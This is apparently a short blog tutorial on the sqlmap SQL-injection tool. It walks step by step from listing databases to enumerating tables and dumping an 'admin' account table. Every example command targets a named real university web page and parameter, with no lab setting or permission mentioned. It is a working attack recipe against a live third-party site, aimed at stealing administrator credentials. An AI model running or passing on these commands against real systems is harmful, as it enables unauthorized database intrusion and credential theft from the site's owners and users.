sqlmap
sqlmap -u (sites target) --dbsChange (sites target) to website containing vulnerability
sqlmap -u http://greencampus.uns.ac.id/unsbersih/artikel/artikel.php?nim=I0114012 --dbsAfter finding Database, select one of database for finding tables
sqlmap -u (sites target) -D (database) --tablesChange (database)
sqlmap -u http://greencampus.uns.ac.id/unsbersih/artikel/artikel.php?nim=I0114012 -D unsbersih --tablesAfter finding tables choose admin account
sqlmap -u (sites target) -D (database) -T (admin_account) --dumpFor example :
sqlmap -u http://greencampus.uns.ac.id/unsbersih/artikel/artikel.php?nim=I0114012 -D unsbersih -T admin --dumpFor more information watch this video.
Labels: Database Assessment, linux, Web Application Analysis